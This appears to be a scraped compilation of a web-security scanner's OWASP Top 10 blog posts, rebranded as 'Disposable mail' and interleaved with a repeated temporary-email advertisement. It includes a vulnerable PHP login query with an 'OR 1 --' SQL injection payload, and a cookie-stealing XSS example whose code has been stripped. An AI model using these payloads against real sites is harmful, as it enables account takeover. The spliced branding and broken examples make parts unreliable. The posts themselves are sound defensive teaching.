OWASP TOP 10: Injection | Disposable mail Blog – 10 minute mail

Injection, the first on OWASP‘s Top 10 list, is often found in database queries, as well as OS commands, XML parsers or when user input is sent as program arguments. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. 

Description

Injection is the first item on OWASP’s list. This type of finding is more like a category, and includes all kinds of vulnerabilities where an application sends untrusted data to an interpreter. It is often found in database queries, but other examples are OS commands, XML parsers or when user input is sent as program arguments.

Prevalence

This is a very common vulnerability type, especially in legacy code as it was way more common a few years ago when fewer were aware of the danger. SQL-injection is to be considered the most known injection type, and according to a survey conducted by Ponemon 65 percent of the organizations represented in the survey had experienced a SQL-injection attack in the prior 12 months. That research was published two years ago, but should still be able to be used as an estimation.

Potential impact

As it is a very broad category of a vulnerability, the danger varies greatly from case to case. As SQL injection is the most known injection-type, the impact is often stolen data from a database. That can include usernames, password and other sensitive information.

The worst-case scenario would be a full takeover of the system, which certainly is possible depending on where the injection is and in what environment.

It is an attack that can be automated, which puts you at higher risk. An attacker does not need to be after you, they can simply write a script that exploits as many sites as possible and yours being one of them is a coincidence.

Well-known events

A few famous/infamous events involving SQL-injections specially can be found on Wikipedia,

One of the most known attacks done by SQL injection was targeted against Sony. Another almost ironic one was when MySQL themselves suffered from an SQL-injection. As can be understood from the examples, big players are also at risk and the result of an attack can be terrifying.

How to discover

For more advanced users it is a vulnerability that can often be found while doing code analysis. Ie., identifying all queries in the web application and following the data flow. As it sometimes generates no visible feedback it can be hard to detect during a blackbox-test, even though it often is possible as well.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Exploitability

As Injection is a very broad definition it varies from case to case, but a general classic SQL-injection is very easy to exploit. Troy Hunt once uploaded a video of him teaching a three year old to exploit an SQL-injection to demonstrate that really anyone can learn to exploit this kind of vulnerability.

Code example of vulnerable application

A typical example of a SQL injection would be in a login form, with the code shown below:

 $db = new mysqli('localhost', 'root', 'passwd', 'base');

$result = $db->query('SELECT * FROM users WHERE user="'.$_GET['user'].'" AND pass= "'.$_GET['password'].'"');

Suppose the attacker submits “ OR 1 — as username and whatever as password the whole query will end up looking like this:

SELECT * FROM users WHERE user="" OR 1 -- AND pass="whatever"

Everything after — (which indicates the start of a comment in SQL) will be discarded and ignored. The query to be executed would then look like this:

SELECT * FROM users WHERE user="" OR 1

The query now states “Grab everything (SELECT *) from the user list (FROM users) where the username matches nothing (WHERE user=””) or 1 (which will be interpreted as True (OR 1))”.

Since the latter statement will always result in True, the right hand of the statement will successfully eliminate the left hand statement and the condition will always be true. The result of that query would be the same as this one:

SELECT * FROM users

Which would return all data there is about all the users. Eg., the injection in the $_GET[‘user’]parameter is enough to make the MySQL server to select the first user and grant the attacker access to that user.

Remediation

1. As Injections is more of a category of vulnerabilities, the remediation varies from case to case depending on what kind of vector and interpreter we are talking about. The optimal solution is to use an API which either avoids the interpreter or provides a parameterized interface.

Parameterized queries are not hard to do, and if you use PHP we would recommend PDO. It may sound strange at first, but it really is not as hard as you may first think. Examples in other languages can be found here.

2. If parameterized queries are not an option in your case, you should instead carefully escape special characters. How this is done depends on the interpreter used, and something you would need to look up.

3. Whitelist input validation is also an alternative, but often cannot be used as the application can require special characters as input. For example, a blog wants to allow its visitors to make comments using quotes, even though that is a character that could be used to break out from a query. In those cases it is necessary to go with solution one or two.

Injection Proof of Concept video:

Read more
The Ultimate SQL Injection Payload
SQL Injection Support Entry
What is an SQL Injection and How Do You Fix It
SQL Injection In 1 Min!
New Findings: Joomla, JBoss, Jenkins and others

Other injection types we have mentioned:
How Patreon Got Hacked: Publicly Exposed Werkzeug Debugger
How We Got Read Access On Google’s Production Servers

OWASP:
Top 10: Injection

 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP Top 10 Vulnerabilities Explained – 10 minute mail

OWASP is a non-profit organization with the goal of improving the security of software and internet. They have put together a list of the ten most common vulnerabilities to spread awareness about web security.  In this post, we have gathered all our articles related to OWASP and their Top 10 list. If you’d like to learn more about web security, this is a great place to start! 

Our OWASP TOP 10 posts offer an insight into each of the 10 vulnerability types on OWASP’s list. We describe the vulnerabilities, the impact they can have, and highlight well-known examples of events involving them. Of course, we also explain how to discover these vulnerabilities, providing code examples and helpful remediation tips.

OWASP TOP 10: Injection

Injection is a category that includes all kinds of vulnerabilities where an application sends untrusted data to an interpreter. It is often found in database queries, but other examples are OS commands, XML parsers or when user input is sent as program arguments.
Read full article »

OWASP TOP 10: Broken Authentication

Broken Authentication involves all kinds of flaws that are caused by error in implementations of authentication and/or session management. The category includes everything from login lacking timeout, meaning that users who forget to logout on a public computer can get hijacked, to more technical vulnerabilities such as session fixation.
Read full article »

OWASP TOP 10: Sensitive Data Exposure

Sensitive Data Exposure occurs when an application does not adequately protect sensitive information. The data can vary and anything from passwords, session tokens, credit card data to private health data and more can be exposed.
Read full article »

OWASP TOP 10: XXE (XML External Entities)

XXE allows attackers to abuse external entities when an XML document is parsed. If this happens, the attacker can read local files on the server, force the parser to make network requests within the local network, or use recursive linking to perform a DoS attack.
Read full article »

OWASP TOP 10: Broken Access Control

Broken Access Control is vulnerability category that covers all access control issues that can make your website vulnerable and can often be found in web applications that have gradually grown in size without proper schemes regulating access. The category is the result of merging Insecure Direct Object References and Missing Function Level Access Control from the OWASP Top 10 2013 list.
Read full article »

OWASP TOP 10: Security Misconfiguration

Security misconfiguration is a very common vulnerability category that occurs when a component is susceptible to attack due to an insecure configuration. At worst, exploiting a security misconfiguration can lead to a full takeover.
Read full article »

OWASP TOP 10: Cross-site Scripting (XSS)

Cross-site Scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of an XSS flaw enables the attacker to inject client-side scripts into web pages viewed by users. It is often assumed XSS only occurs in JavaScript, but it could also include e.g. VBScript.
Read full article »

OWASP TOP 10: Insecure Deserialization

Insecure Deserialization allows attackers to transfer a payload using serialized objects. This happens when integrity checks are not in place and deserialized data is not sanitized or validated.
Read full article »

OWASP TOP 10: Using Components with Known Vulnerabilities

It is very common for web services to include a component with a known security vulnerability. The component with a known vulnerability could be the operating system itself, the CMS used, the web server, some plugin installed or even a library used by one of these plugins, making this a very frequent finding.
Read full article »

OWASP TOP 10: Insufficient Logging and Monitoring

Insufficient Logging and Monitoring covers the lack of best practices that should be in place to prevent or damage control security breaches. The category includes everything from unlogged events, logs that are not stored properly and warnings where no action is taken within reasonable time.
Read full article »

 

OWASP TOP 10 on Disposable mail Labs

Want more advanced tech content about OWASP Top 10 vulnerabilities? Check out these posts on Disposable mail Labs:

The Ultimate SQL Injection Payload
Finding an XSS in an HTML-based Android application
5 contexts where the XSS Auditor won’t help you
How to: Exploit an XSS
Frans Rosén’s Bugcrowd Guest Blog: Using a Braun Shaver to Bypass XSS Audit and WAF
How Patreon got hacked: Publicly exposed Werkzeug Debugger

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

IT Security FAQ 7: What is OWASP Top 10? – 10 minute mail

The Open Web Application Security Project (OWASP) is a worldwide not-for-profit charitable organization focused on improving the security of software. Their mission is to make software security visible, so that individuals and organizations can make informed decisions about cyber security risks. They also present at list called OWASP top 10 with the ten most common security issues online.

Comment from our expert:
”OWASP top 10 doesn’t focus on specific vulnerabilities but rather concepts in general that are usual security breaches in software. For example, the login and authentication module is often weak on many websites. The list gives some ideas on what to think about in terms of cyber security. I think it’s good for developers to read through it at least once and reflect upon it,” says Johan Edholm at Disposable mail.

To find out more, visit the OWASP top 10 project and check out our series on OWASP top 10 security issues. Want to test your site for OWASP vulnerabilities? Sign up for a free trial and run a Disposable mail scan!

Want more IT security information? Don’t miss out on the other parts of our IT Sec FAQ series!

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Broken Authentication – 10 minute mail

The next vulnerability on OWASP’s Top 10 list is Broken Authentication, a broad category covering a wide range of  security flaws. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. 

Description

Broken Authentication involves all kinds of flaws that are caused by error in implementations of authentication and/or session management. Due to the wide range of different vulnerabilities therein it is quite hard to define its general properties.

The category includes everything from login lacking timeout, meaning that users who forget to logout on a public computer can get hijacked, to more technical vulnerabilities such as session fixation.

Prevalence

Developers tend to write their own implementations of stuff related to authentication and session management. That is something that is hard to get right, which is why different kinds of flaws within this category are so common.

Potential impact

The goal of an attack is to take over one or more accounts, and for the attacker to get the same privileges as the attacked user. If the attacker successfully hijacks an admin account, the attacker could therefore do as much as an ordinary admin, which depending on the application could have a great impact.

Exploitability

As it is such a broad category it is impossible to say how hard it is to exploit. OWASP classifies the exploitability as average, but it really depends on the specific vulnerability. Some of the vulnerabilities that fall into this category can be automated, but many of them require the attacker to be manually involved in the attack.

Well-known events

One of the type of findings that falls into this category is storing passwords in plain text. If someone were to hack a service and get hold of the passwords in plain text, the attacker could use those credentials to log into the service as any user. As people tend to re-use passwords, an attacker could also try these credentials to log into other services.

One of the most known recent cases of what have been described above is when 000webhost got hacked last year. That leak alone meant 13 million credentials in plain text.

How to discover

Some of these vulnerabilities can be scanned for automatically, which Disposable mail does when possible. However, some of the vulnerabilities under this category are simply not possible to look for in an automatic way.

When searching for this kind of vulnerabilities, it is of great advantage to read all the source to get a better overview of the situation. As it is such a broad category as it is, the ways to look for these vulnerabilities vary as well.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Example of a vulnerable application

A webshop put the session id in the url. The links will look like this: http://example.com/?product=chair&session=51233123

If the user likes that product and wants to share a link with a friend, they would copy the link without giving it much thought. When the friend then clicks on the links, they inherit the same session id and if they decide to buy something, the first user’s credit card will be charged.

Remediation

Security needs to be part of the developing process from the beginning. That is the only way to ensure nothing can be abused in a way that was not thought about during developing, as those kinds of vulnerabilities are hard to look for afterwards.

Many of the vulnerabilities within the category exist because developers mess up in some way. It is possible to fight that problem by making it harder for developers to make mistakes. This can be done by creating simple APIs which prevent incorrect use that leads to vulnerabilities. There are also many solutions available that have already been tested, so it is a good idea to look into that before reinventing the wheel.

The last vulnerability that will be mentioned here, even though this category involves many more, are XSSes that can be used to steal session cookies. There are several ways to resolve these, or at least make them not quite as bad. We recommend two of our remediation documents:
XSS
Missing HTTPOnly

Read more

OWASP:
Top 10: Broken Authentication and Session Management

 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Cross-site Scripting – XSS – 10 minute mail

Cross-site scripting is one of the most common OWASP vulnerabilities, affecting both small businesses and large corporations. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. A proof of concept video is found at the end of the article. 

Description

Cross-site scripting is a type of attack that can be carried out to compromise users of a website. The exploitation of a XSS flaw enables the attacker to inject client-side scripts into web pages viewed by users.

It is often assumed that cross-site scripting means JavaScript, but could also include e.g. VBScript.

Prevalence

Cross-site scripting is often said to be the most common vulnerability, and many sites are affected. This includes small local sites as well as giants like Google. In 2016, Cross-site scripting was among the top 5 most common critical vulnerabilities discovered by the Disposable mail scanner.

Potential impact of cross-site scripting vulnerabilities

Due to the ability to execute JavaScript under the site’s domain, the attackers are able to:

  • View anything the user sees, and steal sensitive information by doing so.
  • Change what the user sees and manipulate information.
  • Basically do everything a normal user could, as the attacker can both see and change anything presented to the user. This includes bypass of all CSRF-protections. To put it into context; if the attacker successfully tricks an admin to execute the XSS, the attacker can do everything an admin could do.
  • Do things that the vulnerable domain has access to do, which can buy access to the user’s webcam, microphone or location.

Exploitability

Any source of data that the browser ends up rendering is a potential attack vector. This means there are many different potential ways to exploit the site, and the risk therefore increases.

Cross-site scripting is considered one the easier to understand vulnerability types. With that said, there is no limits on how to complicated it can be to exploit under different circumstances and protections.

Well-known events

One of many great examples where XSS is used as a part in a longer chain of attacks is the following: https://blogs.apache.org/infra/entry/apache_org_04_09_2010

One of the most famous attacks is the attack called Samy. Within 20 hours, over a million users had fallen victim for the vulnerability. This happened in 2005, but even today there are several examples showing that XSS is a vulnerability type to keep an eye on.

Another well-known attack, similar to Samy, is the only two years old attack on TweetDeck. They had a cross site scripting-vulnerability, and everyone who fell victim for it retweeted it. This means it quickly turned into a worm that spread itself.

How to discover cross-site scripting

It is possible to categorise cross-site scripting vulnerabilities in different subcategories. One of those are the ones that only lay in the client, where the site owner would need to analyze all the JavaScript to identify how all data that originates from a user flows. At first, it is easy to think about only the normal places, but after a while it is obvious that there are many more vectors than one would initially think about.

Then there is reflected cross-site scripting, which is when page simply reflected some kind of input from the user. E.g.:



However, there are also stored cross-site scripting vulnerabilities, where the server instead echoes something stored in the database.

This makes it hard to automatically analyze everything, as an attacker would benefit from being able to reverse track every output to see where the data comes from and how it has been manipulated on its way there.

In short, it can be concluded that for discovering the first mentioned type the site owner would need to follow the dataflow all through JavaScript to see how it treats user input. In this case, user input can be default variables in JavaScript such as

location.hash

as well as e.g.

form-data

For the second mentioned vulnerability, the site owner needs to look for every location where data is printed, and identify how it got treated on its way there as well as where the data originates from. In real life examples, it is not uncommon to see a combination of these vulnerability types.

How Disposable mail can help

Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including cross-site scripting and other OWASP Top 10 vulnerabilities, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Code example of a vulnerable application

Assume a site does has a search box with code as the following:



// Code for performing the actual search

} else {

echo "Could not find any pages when searching for ".$_GET['query'];
}

?>
https://example.com/search.php?query=test

would therefore result in:

 Could not find any pages when searching for test

This would output the user input straight to the HTML-document. As such, if a user would give HTML as input the browser would be required to render that.

Example, if we were to access

https://example.com/search.php?query=

it would result in the following that the browser would try to render.

 Could not find any pages when searching for 

That is perfectly valid HTML, and the script will get executed.

To show the danger of this, imagine an attacker getting the user to click a link as the following:

https://example.com/search.php?query=

It would result in this, which sends the cookies to the attacker. If there for example were sessions id, an attacker could hijack the session.

Could not find any pages when searching for    

Cross-site scripting remediation

Potentially dangerous characters need to be sanitized, or escaped. How this is done varies depending on the context, and for most cases the article in our knowledge database would be sufficient.

The application should also be developed with the risk of XSS in mind, making it as little harmful as possible if it were to exist a XSS vulnerability. Two of the most well-known methods for this is HttpOnly and CSP. More information about HttpOnly can be found here, while CSP is something that we have not written that much about.

Read more

Related remediation documents:
http://support.detectify.com/customer/en/portal/articles/1711512-cross-site-scripting
http://support.detectify.com/customer/en/portal/articles/1969826-missing-httponly-flag-on-cookies

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)

Other:
http://scriptalert1.com

 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

[Alert] New WordPress XSS Vulnerability Discovered – 10 minute mail

Are you running WordPress 4.2.0 to 4.5.1? Time to upgrade to 4.5.2!

It was recently discovered that WordPress versions 4.2.0 to 4.5.1 are vulnerable against a reflected XSS vulnerability in a specific WordPress SWF-file: flashmediaelement.swf. The vulnerability could lead to leaked WordPress credentials, or be used as a stepping stone to more severe attacks.

3 things you can do to protect your website:

  • Upgrade to WordPress version 4.5.2 as soon as possible.
  • Remove the flashmediaelement.swf file (if you do not know how to proceed, the best option is to simply upgrade the WordPress-version).
  • A third option is to limit the allowed IP addresses to your office or VPN IP.

As always, we recommend you to run regular security tests on your website to keep up with all the latest vulnerabilities.

Stay safe!

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Insecure Direct Object Reference – 10 minute mail

Insecure Direct Object Reference allows attackers to manipulate references to gain access to unauthorized data. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. OWASP Top 10 2017 was released in November 2017, bringing some changes to the list from 2013. We are working on updating our content, but in the meantime, please take a look at our article about OWASP Top 10 2017.

Description

The fourth one on the list is Insecure Direct Object Reference, also called IDOR. It refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. In such cases, the attacker can manipulate those references to get access to unauthorized data.

Prevalence

There are no good numbers to base the estimation on and OWASP’s formulation on the subject is also very vague. However, by looking at well-known events as well as public bug bounty-reports it can be confirmed that it is a very common vulnerability. This is also what we have discovered during our own security research.

Potential impact of Insecure Direct Object Reference

It is impossible to say what the potential impact of IDOR is, as it varies alot depending on what kind of data or file the attacker may get hold of. It could be anything from innocent information to bank statements, and much more.

Exploitability

Due to it being so easy for an attacker to exploit, IDOR is very likely to be abused. This of course varies as well, as it may not always be obvious how to enumerate the links for the files.

Well-known events

Back in 2010 when iPad was the coolest gadget for early adopters, AT&T suffered by an Insecure Direct Object Reference that exposed the details of at least over 100.000 owners. It exposed the email address of the owners, as well as the ICC-IDs (the ID of the SIM-card). As Apple provided the data to AT&T, they often receive the blame for this vulnerability.

By sending a request to AT&T together with an ICC-ID, the server would respond with the corresponding email address. As the ICC-IDs can be enumerated by looking at just a few IDs, this attack could be fully automatised allowing a considerable data leak.

How to discover Insecure Direct Object Reference

Code analysis is suitable for this kind of vulnerability. Every place that presents restricted data needs to be investigated, to make sure that there are checks in place ensuring that the user is authorized for the requested information.

This can of course be automated to some extent without access to the source code of the site, but having it is a great advantage. With the source in hand, a vulnerability like this is often quite easy to discover.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Example of vulnerable application

When a user accesses the dashboard on the user’s bank’s website, the user gets redirected to the following url:
https://bank/balance?acc=123

In this case, 123 is the ID of the user’s account, and the user will therefore see that balance. If the user wanted to abuse this, it would be possible to just change the URL-parameter to someone else’s ID and instead get access to that ID’s account.

Remediation

The only real solution to this issue is to implement an access control. The user needs to be authorized for the requested information before the server provides it.

It is also often recommended to use something less obvious that is harder to enumerate as a reference. Eg., a random string instead of an incrementing integer. This can be a good idea for multiple reasons, but should absolutely not be trusted as the only prevention against such an attack.

IDOR Proof of Concept video:

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References
https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)

Interesting public bug bounty-reports:
https://hackerone.com/reports/42587
https://hackerone.com/reports/53858

Other:
https://www.troyhunt.com/owasp-top-10-for-net-developers-part-4/

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Security Misconfiguration – 10 minute mail

Security misconfiguration is the fifth vulnerability on OWASP‘s list of the ten most common vulnerabilities. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their Top 10 list one by one in our OWASP Top 10 blog series. 

Description

If a component is susceptible to attack due to an insecure configuration it would classify as security misconfiguration. This is considered the same vulnerability regardless of whether the misconfiguration occurs in the web server, database or in custom code.

Prevalence

As security misconfiguration is such a broad category, it is a very common vulnerability. A web application is built upon multiple layers and making a configuration mistake in one of them is quite likely.

Potential impact

The impact varies and depends on the specific kind of misconfiguration. At worst, it could lead to a full takeover, which means stolen sensitive data and expensive recovery.

Exploitability

In many cases this is one of the easiest vulnerabilities to exploit. For example, if a system admin forgets to delete a default account with admin privileges, all an attacker has to do is to simply google the default credentials to login.

Of course, there are more difficult versions of this vulnerability out there that require more knowledge. All misconfigurations do not result in a possible full takeover, but may be used as part of a bigger attack.

Well-known events

Werkzeug Debugger included a console, allowing a user to execute system commands. Some exposed that interface to the internet, which would result in an RCE (remote code execution). An example of this that has received a lot of attention is when we found this vulnerability at Patreon.

How to discover

The only way to discover security misconfigurations is to start looking over the system.

  • Are any default accounts left, and if so, have the passwords been changed?
  • When it is possible to enforce better security in a framework, are those options chosen?
  • Are there any unnecessary features installed/enabled that can be removed? This includes accounts, too many privileges, ports, etc.
  • Does the error handling reveal overly informative error messages to users? This is one of the most common issues.

How Disposable mail can help with security misconfiguration

Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used in both staging and production. Sign up for a free trial to find out if you are vulnerable » 

Example of vulnerable application

A great example that helps understand this issue is the aforementioned Patreon case. There is often some feature allowing debugging the system. If that feature is exposed towards the internet and not behind any authorisation, any user could abuse it.

Prevention

  • Make sure everything is updated. When building the system, make it easy to deploy software updates and patches.
  • Use the same configuration for staging, production and developing environments. Many misconfigurations are the result of inconsistencies.
  • Humans are good at making mistakes, which is why you should automate what can be automated. If the same setup procedure is performed often, it is better to make sure it is secure once and then just repeat it.
  • Perform scans and/or audits regularly to discover future misconfigurations.
  • When possible, configure the system with the thought in mind that the system will get compromised because that is very likely. In case of a security breach, an attacker should only be able to do very little damage.

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration

Our blog:
How Patreon got Hacked: Publicly Exposed Werkzeug Debugger

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Sensitive Data Exposure – 10 minute mail

Sensitive Data Exposure, an OWASP Top 10 vulnerability that often affects smaller players, can put critical sensitive data at risk. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. 

Description

Sensitive Data Exposure occurs when an application does not adequately protect sensitive information. The data can vary and anything from passwords, session tokens, credit card data to private health data and more can be exposed.

A few examples would be exposed data that someone mistakenly uploaded somewhere, weak crypto that means an attacker would be able to read the data if they successfully compromised the target and the lack of headers that prevent browser caching. In short, every possible way where it would have been possible to better protect the sensitive data.

Prevalence

When building an application, many are going to down-prioritise protection of sensitive data, and even if the developer is aware of the fact that they should, for example, hash passwords, it is common to plan to do this afterwards. A workable application is the top priority and once the application is working, the planned protection is forgotten, or simply skipped.

Dealing with crypto is also one of the most difficult things to do. It is therefore common to make mistakes when implementing a self-built solution, which will result in insufficient protection of data.

Sensitive Data Exposure is therefore a typical vulnerability that is worst for small players, like hobby projects and smaller companies. However, as can be seen by looking at some well-known events, big players are affected by these vulnerabilities as well, but not as often.

Potential impact

As the finding only applies to sensitive data, the potential impact is always considered high. What the data consists of varies and so does the impact. The danger lies in the data being exposed, and the potential impact reflects the data’s sensitivity.

For example, if credit card data is stolen, the attacker can empty the victim’s bank account. If passwords are exposed, the attacker can abuse these credentials. If certificates are stolen, the attacker can pretend to be the target. It all depends on what kind of data is at risk of being exposed.

Exploitability

Most crypto-related vulnerabilities are considered hard to exploit, especially on a larger scale. With that said, some of the vulnerabilities that fall into this category are really easy to “exploit”. If an attacker were to get hold of a database that had been left unencrypted, they would not need to do anything special at all to access sensitive data. With a layer of protection removed from the attack process, exploiting the vulnerability can be considered easy.

In general, with the exception of strictly crypto-focused ones, the vulnerabilities within this category are likely to get exploited.

Well-known events

100 million passwords in plain text from VK.com have recently been leaked. That means that the attacker could, after getting access to the database, login as any user of choice. It also means that if a user were to use the same password on VK.com as on another site, anyone (as the leak is public) would be able to use these credentials to logon to that service and cause great harm.

Another example of a different vulnerability still within this category are exposed tokens in public source code. Many companies have mistakenly exposed private sensitive tokens on Github, which we have written about before. By searching for publicly available code, an attacker could get full access to internal communication.

How to discover

This is not a vulnerability that you can look for in the same sense as other more traditional vulnerabilities. Most vulnerabilities within this category cannot be scanned for due to two main reasons:

  • To determine risk, it must be decided what information is considered sensitive, which can be a hard task to carry out automatically.
  • An external pentester cannot know whether internal data is encrypted or not as that is not exposed.

To assess whether you are vulnerable to Sensitive Data Exposure, read the steps under Prevention and establish if any of the steps have not yet been taken. In most cases, this is the only way to identify this vulnerability type.

However, some of the findings can be automatically scanned for, such as lack of sufficient headers to prevent caching behind pages that require authentication or lack of HTTPS on logins.

How Disposable mail can help

We provide a quick and easy way to check whether your site passes or fails OWASP Top 10 tests. Disposable mail is a web security scanner that performs fully automated tests to identify security issues on your website. It tests your website for over 700 vulnerabilities, including OWASP Top 10, and can be used on both staging and production environments. Sign up for a free trial to find out if you are vulnerable » 

Example of vulnerable application

As the finding includes every case where sensitive data is exposed or insufficiently protected, the examples are many. To get an idea, here are a few of the most common ones:

  • Data stored in plain text, such as passwords or credit card data (see the first well-known event)
  • Lack of HTTPS on authenticated pages
  • Hashed passwords with lack of salt, making the password easily cracked
  • Tokens disclosed in public source code (see the second well-known event)

Prevention

The first step is to figure out what data can be considered sensitive and therefore important to protect.

When that is done, go over each of these data points and make sure that:

  • The data is never stored in clear text.
  • The data is never transmitted in clear text. Example between database and server, or over the internet.
  • The algorithms used to encrypt the data are considered strong enough.
  • The generation of the keys is secure.
  • Browser headers are set to not cache when the sensitive data is presented to end-user.

There are more things to look for when securing data, but what matters most is understanding what data is considered sensitive, and make sure it is treated as such in every instance.

Read more

OWASP:
https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

OWASP TOP 10: Missing Function Level Access Control – 10 minute mail

Missing Function Level Access Control is one of the vulnerabilities on OWASP’s Top 10 list and occurs when authentication checks in request handlers are insufficient. A proof of concept video follows this article. OWASP is a non-profit organization with the goal of improving the security of software and the internet. We cover their list of the ten most common vulnerabilities one by one in our OWASP Top 10 blog series. OWASP Top 10 2017 was released in November 2017, bringing some changes to the list from 2013. We are working on updating our content, but in the meantime, please take a look at our article about OWASP Top 10 2017.

Description

If the authentication check in sensitive request handlers is insufficient or non-existent the vulnerability can be categorised as Missing Function Level Access Control.

An example of this would be an unauthorised user being able to access a URL that contains any sensitive information or exposes functionality intended only for authorized users. Another example of a common type of this vulnerability would be to simply hide a feature from the user, but allowing the request if the user is able to figure out how to conduct it. An example of the latter can be found under the title Code Example in this article.

In some ways this category of vulnerabilities is very similar to IDOR that we have previously written about. To simplify, it can be said that the difference is that IDOR exposes information by going to a URL that an ordinary user should not know about, while this category involves vulnerabilities that expose functionality rather than information. Missing Function Level Access Control vulnerabilities can also require more from the attacker than enumerating a URL.

Prevalence

When OWASP devised their list of the most important vulnerabilities in 2010, this vulnerability was listed as uncommon. Three years later, in 2013, the status had changed to common and it had at the same time jumped up a step on the OWASP Top 10 list.

From our experience we can tell that this is a vulnerability that affects websites and companies of all sizes. However, bigger ones seem to be more seriously affected due to the complexity of their systems.

Potential impact of Missing Function Level Access Control

As with many of the vulnerabilities taken up in the series, the potential impact of Missing Function Level Access Control greatly depends on what kind of information or features the attacker can gain access to. It can be anything from seemingly useless information to a full system takeover. When this vulnerability is discussed it is usually vulnerabilities with the impact somewhere in between.

To concretize the impact, the following comparison can be made: It is often possible to execute actions under other regular users’ names without touching anything related to admins.

Exploitability

Detecting and taking advantage of this vulnerability is considered easy. Often, all it takes is for the attacker to attempt a specific action that should require authentication and if the request succeeds, the page is considered vulnerable. What is hard to do here is to figure out every page that is at risk or feature that could potentially lead to anything dangerous.

As with every other vulnerability, there are instances where Missing Function Level Access Control is really hard to exploit and sometimes it is just part of a chain attack that requires a great amount of creativity, but such cases are exceptions rather than the rule.

Well-known events

There are many interesting cases, but to use one as an example we can take this Hackerone report on a Twitter vulnerability.

By intercepting the request sent to delete his own credit card, the user was able to change the ID of the credit card that was going to be deleted, and by doing so delete an account that was not his. This could have resulted in a halted campaign and, consequently, a considerable business advantage.

Please see the report above for more details as we only cover it as proof that these vulnerabilities do exist in the wild.

How to discover

One way to discover Missing Function Level Access Control is to browse the website while logged in and log all pages visited. The next step is to log out and then revisit all pages. If you get the same result, it is likely that this vulnerability exists. Some proxies made for security testing support this type of analysis by default.

